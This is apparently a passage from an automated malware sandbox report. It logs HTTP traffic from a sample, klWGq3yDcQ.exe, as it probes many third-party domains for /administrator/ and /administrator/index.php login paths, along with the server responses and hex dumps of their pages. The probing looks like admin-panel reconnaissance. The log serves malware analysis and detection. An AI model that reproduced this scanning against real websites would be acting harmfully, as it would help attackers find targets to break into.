                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.45176735.237.190.156806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.055607080 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: krkconcord.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.338794947 CET450INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=20
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:29 GMT
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    X-Redirect-By: redirection
                                                                                                                                                                                                    Location: https://kidsrkids.com/concord/administrator/
                                                                                                                                                                                                    X-Powered-By: WP Engine
                                                                                                                                                                                                    X-Pass-Why: custom-path
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.564090967 CET241OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: krkconcord.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.809233904 CET459INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Keep-Alive: timeout=20
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:29 GMT
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    X-Redirect-By: redirection
                                                                                                                                                                                                    Location: https://kidsrkids.com/concord/administrator/index.php
                                                                                                                                                                                                    X-Powered-By: WP Engine
                                                                                                                                                                                                    X-Pass-Why: custom-path


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    4192.168.2.45177815.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.057447910 CET232OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: rdelealtad.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.156558990 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-165.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 4df277e5-902c-45ce-8955-cd14e6f7838d
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.157010078 CET288OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: rdelealtad.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://rdelealtad.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.253317118 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-53.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 8fa00024-2a62-4b72-b0ac-9b7de3b85a6c
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    5192.168.2.451887185.230.63.171806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.078598976 CET227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.226094961 CET829INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.dstaq.com/en/administrator
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                    x-wix-request-id: 1700978369.120103286909615147
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRaliWaSbW3u7I9QcixekHcy+JhKcozXeSCkSNv+6fxh/ipqV/6c3pJvTuDo3Yope6yBA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,HGBagNbHaHjyb4d/UK6fckbYqB6/hwX5/SRH1bPtEcQ=,1TnztLIEn9oM+NgebUxhZWunrbwcx7Ajica9WZCxGPE=,znHLAI6vxugFKypFMbJjohE+8x/tk7l8GwSAJmCSTgCYAUFYY3pK7mBx1XtgArCQMbNKQ6oO/j9crZ4+jsEe9A==
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.601417065 CET285OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.dstaq.com/en/administrator
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.772175074 CET839INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    location: https://www.dstaq.com/en/administrator/index.php
                                                                                                                                                                                                    strict-transport-security: max-age=3600
                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                    x-wix-request-id: 1700978372.641103286909625147
                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                    X-Seen-By: vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalveHi8sq+ETLoQsgLlInIymrDYiGWBW044EMoSWtXBIZ6+FADXC+YqrdjLt28/RyMw==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,WyqNozw2Xgx3ikDivcwNJxYyidTrj7yKAMUEpWCfPK4=,KWKVLcH06BSVHBU4yeQ12bMSxNw/CTILSKCpF1mrPZQ=,znHLAI6vxugFKypFMbJjog+iPrwMgRA+grqxwY82aOS7ToYUcIEHdkpKKWHX1KtJNY7SLVVQv0TXn1MtuyNR+g==
                                                                                                                                                                                                    X-Content-Type-Options: nosniff


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    6192.168.2.451779159.203.32.4806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.078958035 CET236OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.188868046 CET609INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                    Location: https://jamiesonmullin.com/administrator/
                                                                                                                                                                                                    Content-Length: 333
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6d 69 65 73 6f 6e 6d 75 6c 6c 69 6e 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6a 61 6d 69 65 73 6f 6e 6d 75 6c 6c 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://jamiesonmullin.com/administrator/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at jamiesonmullin.com Port 80</address></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.171823025 CET297OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://jamiesonmullin.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.280998945 CET627INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                    Location: https://jamiesonmullin.com/administrator/index.php
                                                                                                                                                                                                    Content-Length: 342
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 61 6d 69 65 73 6f 6e 6d 75 6c 6c 69 6e 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6a 61 6d 69 65 73 6f 6e 6d 75 6c 6c 69 6e 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://jamiesonmullin.com/administrator/index.php">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at jamiesonmullin.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    7192.168.2.45188915.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.080696106 CET235OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: midcapfunding.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.178780079 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-67.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 534af604-dfa1-47fe-b504-c3dc942f463b
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.547977924 CET294OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: midcapfunding.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://midcapfunding.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.646491051 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-244.ec2.internal
                                                                                                                                                                                                    X-Request-Id: bf90e307-33ae-4a75-860a-6b98e1ef64c7
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    8192.168.2.45189468.168.209.252806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.095092058 CET227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: bvhrs.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.194861889 CET486INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                    Content-Length: 271
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.547121048 CET278OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: bvhrs.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://bvhrs.com/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.647335052 CET486INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                    Content-Length: 271
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    9192.168.2.45178366.81.203.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.112291098 CET233OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: townshipnjr.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.267379045 CET1033INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.14.2
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:29 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Last-Modified: Mon, 20 Feb 2023 14:02:48 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: W/"63f37d88-574"
                                                                                                                                                                                                    Content-Encoding: gzip
